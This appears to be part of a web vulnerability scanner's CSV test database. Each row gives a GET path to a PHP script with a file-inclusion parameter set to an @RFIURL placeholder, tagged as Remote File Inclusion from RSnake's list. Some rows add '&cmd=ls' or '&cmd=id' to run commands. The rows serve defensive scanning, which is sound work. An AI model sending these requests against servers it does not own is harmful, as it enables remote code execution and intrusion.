"003927","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003928","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003929","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003930","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003931","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003932","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003933","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003934","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003935","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003936","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003937","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003938","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003939","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003940","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003941","https://gist.github.com/mubix/5d269c686584875015a2","c","/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003942","https://gist.github.com/mubix/5d269c686584875015a2","c","/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=@RFIURL?admin","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003943","https://gist.github.com/mubix/5d269c686584875015a2","c","/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003944","https://gist.github.com/mubix/5d269c686584875015a2","c","/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003945","https://gist.github.com/mubix/5d269c686584875015a2","c","/CheckUpload.php?Language=@RFIURL&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003946","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/backend_search.php?contenido_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003947","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003948","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003949","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003950","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003951","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003952","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003953","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003954","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003955","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003956","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003957","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003958","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003959","https://gist.github.com/mubix/5d269c686584875015a2","c","/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003960","https://gist.github.com/mubix/5d269c686584875015a2","c","/CoupleDB.php?Parametre=0&DataDirectory=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003961","https://gist.github.com/mubix/5d269c686584875015a2","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003962","https://gist.github.com/mubix/5d269c686584875015a2","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003963","https://gist.github.com/mubix/5d269c686584875015a2","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003964","https://gist.github.com/mubix/5d269c686584875015a2","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003965","https://gist.github.com/mubix/5d269c686584875015a2","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003966","https://gist.github.com/mubix/5d269c686584875015a2","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003967","https://gist.github.com/mubix/5d269c686584875015a2","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003968","https://gist.github.com/mubix/5d269c686584875015a2","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003969","https://gist.github.com/mubix/5d269c686584875015a2","c","/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003970","https://gist.github.com/mubix/5d269c686584875015a2","c","/DON3/applications/frontpage.don3app/frontpage.php?app_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003971","https://gist.github.com/mubix/5d269c686584875015a2","c","/Dir_phNNTP/article-raw.php?file_newsportal=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003972","https://gist.github.com/mubix/5d269c686584875015a2","c","/DynaTracker_v151/action.php?base_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003973","https://gist.github.com/mubix/5d269c686584875015a2","c","/DynaTracker_v151/includes_handler.php?base_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003974","https://gist.github.com/mubix/5d269c686584875015a2","c","/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003975","https://gist.github.com/mubix/5d269c686584875015a2","c","/Ex/modules/threadstop/threadstop.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003976","https://gist.github.com/mubix/5d269c686584875015a2","c","/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003977","https://gist.github.com/mubix/5d269c686584875015a2","c","/Exophpdesk_PATH/pipe.php?lang_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003978","https://gist.github.com/mubix/5d269c686584875015a2","c","/FirstPost/block.php?Include=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003979","https://gist.github.com/mubix/5d269c686584875015a2","c","/Flickrclient.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003980","https://gist.github.com/mubix/5d269c686584875015a2","c","/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003981","https://gist.github.com/mubix/5d269c686584875015a2","c","/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003982","https://gist.github.com/mubix/5d269c686584875015a2","c","/Full_Release/include/body_comm.inc.php?content=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003983","https://gist.github.com/mubix/5d269c686584875015a2","c","/Gallery/displayCategory.php?basepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003984","https://gist.github.com/mubix/5d269c686584875015a2","c","/Include/lib.inc.php3?Include=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003985","https://gist.github.com/mubix/5d269c686584875015a2","c","/Include/variables.php3?Include=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003986","https://gist.github.com/mubix/5d269c686584875015a2","c","/Jobline/admin.jobline.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003987","https://gist.github.com/mubix/5d269c686584875015a2","c","/ListRecords.php?lib_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003988","https://gist.github.com/mubix/5d269c686584875015a2","c","/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003989","https://gist.github.com/mubix/5d269c686584875015a2","c","/MOD_forum_fields_parse.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003990","https://gist.github.com/mubix/5d269c686584875015a2","c","/Mamblog/admin.mamblog.php?cfgfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003991","https://gist.github.com/mubix/5d269c686584875015a2","c","/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003992","https://gist.github.com/mubix/5d269c686584875015a2","c","/NuclearBB/tasks/send_queued_emails.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003993","https://gist.github.com/mubix/5d269c686584875015a2","c","/NuclearBB/tasks/send_queued_emails.php?root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003994","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/indexFooter.php?path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003995","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/pages/pageHeader.php?path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003996","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003997","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/scripts/classes/FieldManager.php?path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003998","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/scripts/classes/Filter.php?path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "003999","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004000","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/scripts/classes/Form.php?path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004001","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/scripts/classes/FormManager.php?path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004002","https://gist.github.com/mubix/5d269c686584875015a2","c","/OpenSiteAdmin/scripts/classes/LoginManager.php?path=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004003","https://gist.github.com/mubix/5d269c686584875015a2","c","/PHP/includes/header.inc.php?root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004004","https://gist.github.com/mubix/5d269c686584875015a2","c","/PHPDJ_v05/dj/djpage.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004005","https://gist.github.com/mubix/5d269c686584875015a2","c","/PHPDJ_v05/dj/djpage.php?page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004006","https://gist.github.com/mubix/5d269c686584875015a2","c","/PaTh/index.php?rootpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004007","https://gist.github.com/mubix/5d269c686584875015a2","c","/Path_Script/createurl.php?formurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004008","https://gist.github.com/mubix/5d269c686584875015a2","c","/PhotoCart/adminprint.php?admin_folder=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004009","https://gist.github.com/mubix/5d269c686584875015a2","c","/Picssolution/install/config.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004010","https://gist.github.com/mubix/5d269c686584875015a2","c","/Picssolution/install/config.php?path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004011","https://gist.github.com/mubix/5d269c686584875015a2","c","/RGboard/include/footer.php?_path[counter]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004012","https://gist.github.com/mubix/5d269c686584875015a2","c","/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004013","https://gist.github.com/mubix/5d269c686584875015a2","c","/SQuery/lib/gore.php?libpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004014","https://gist.github.com/mubix/5d269c686584875015a2","c","/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004015","https://gist.github.com/mubix/5d269c686584875015a2","c","/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004016","https://gist.github.com/mubix/5d269c686584875015a2","c","/ScriptPage/source/includes/load_forum.php?mfh_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004017","https://gist.github.com/mubix/5d269c686584875015a2","c","/ScriptPath/footers.php?tinybb_footers=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004018","https://gist.github.com/mubix/5d269c686584875015a2","c","/ScriptPath/index.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004019","https://gist.github.com/mubix/5d269c686584875015a2","c","/Script_Path/config.inc.php?_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004020","https://gist.github.com/mubix/5d269c686584875015a2","c","/Scripts/app_and_readme/navigator/index.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004021","https://gist.github.com/mubix/5d269c686584875015a2","c","/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004022","https://gist.github.com/mubix/5d269c686584875015a2","c","/Somery/team.php?checkauth=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004023","https://gist.github.com/mubix/5d269c686584875015a2","c","/Upload/install.php?skindir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004024","https://gist.github.com/mubix/5d269c686584875015a2","c","/Widgets/Base/Footer.php?sys_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004025","https://gist.github.com/mubix/5d269c686584875015a2","c","/Widgets/Base/widget.BifContainer.php?sys_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004026","https://gist.github.com/mubix/5d269c686584875015a2","c","/Widgets/Base/widget.BifRoot.php?sys_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004027","https://gist.github.com/mubix/5d269c686584875015a2","c","/Widgets/Base/widget.BifRoot2.php?sys_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004028","https://gist.github.com/mubix/5d269c686584875015a2","c","/Widgets/Base/widget.BifRoot3.php?sys_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004029","https://gist.github.com/mubix/5d269c686584875015a2","c","/Widgets/Base/widget.BifWarning.php?sys_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004030","https://gist.github.com/mubix/5d269c686584875015a2","c","/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004031","https://gist.github.com/mubix/5d269c686584875015a2","c","/[path]/mybic_server.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004032","https://gist.github.com/mubix/5d269c686584875015a2","c","/[path]/previewtheme.php?theme=1&inc_path=@RFIURL?cmd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004033","https://gist.github.com/mubix/5d269c686584875015a2","c","/_administration/securite.php?cfg[document_uri]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004034","https://gist.github.com/mubix/5d269c686584875015a2","c","/_blogadata/include/struct_admin.php?incl_page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004035","https://gist.github.com/mubix/5d269c686584875015a2","c","/_conf/_php-core/common-tpl-vars.php?admindir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004036","https://gist.github.com/mubix/5d269c686584875015a2","c","/_connect.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004037","https://gist.github.com/mubix/5d269c686584875015a2","c","/_friendly/core/data/_load.php?friendly_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004038","https://gist.github.com/mubix/5d269c686584875015a2","c","/_friendly/core/data/yaml.inc.php?friendly_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004039","https://gist.github.com/mubix/5d269c686584875015a2","c","/_friendly/core/display/_load.php?friendly_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004040","https://gist.github.com/mubix/5d269c686584875015a2","c","/_friendly/core/support/_load.php?friendly_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004041","https://gist.github.com/mubix/5d269c686584875015a2","c","/_functions.php?prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004042","https://gist.github.com/mubix/5d269c686584875015a2","c","/_includes/settings.inc.php?approot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004043","https://gist.github.com/mubix/5d269c686584875015a2","c","/_theme/breadcrumb.php?rootBase=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004044","https://gist.github.com/mubix/5d269c686584875015a2","c","/_wk/wk_lang.php?WK[wkPath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004045","https://gist.github.com/mubix/5d269c686584875015a2","c","/abf_js.php?abs_pfad=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004046","https://gist.github.com/mubix/5d269c686584875015a2","c","/about.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004047","https://gist.github.com/mubix/5d269c686584875015a2","c","/about.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004048","https://gist.github.com/mubix/5d269c686584875015a2","c","/aboutinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004049","https://gist.github.com/mubix/5d269c686584875015a2","c","/acc.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004050","https://gist.github.com/mubix/5d269c686584875015a2","c","/access/login.php?path_to_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004051","https://gist.github.com/mubix/5d269c686584875015a2","c","/account.php?insPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004053","https://gist.github.com/mubix/5d269c686584875015a2","c","/active/components/xmlrpc/client.php?c[components]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004054","https://gist.github.com/mubix/5d269c686584875015a2","c","/ad_main.php?_mygamefile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004055","https://gist.github.com/mubix/5d269c686584875015a2","c","/add.cgi.php?blog_theme=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004056","https://gist.github.com/mubix/5d269c686584875015a2","c","/add_link.php?blog_theme=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004057","https://gist.github.com/mubix/5d269c686584875015a2","c","/addpost_newpoll.php?addpoll=preview&thispath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004058","https://gist.github.com/mubix/5d269c686584875015a2","c","/addressbook.php?GLOBALS[basedir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004059","https://gist.github.com/mubix/5d269c686584875015a2","c","/addsite.php?returnpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004060","https://gist.github.com/mubix/5d269c686584875015a2","c","/addvip.php?msetstr[\"PROGSDIR\"]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004061","https://gist.github.com/mubix/5d269c686584875015a2","c","/adm/krgourl.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004062","https://gist.github.com/mubix/5d269c686584875015a2","c","/adm/my_statistics.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004063","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin.loudmouth.php?mainframe=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004064","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin.php?Madoa=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004065","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin.php?cal_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004066","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin.php?env_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004067","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin.php?lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004068","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004069","https://gist.github.com/mubix/5d269c686584875015a2","c","/admin.php?submit=submit&form_include_template=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's 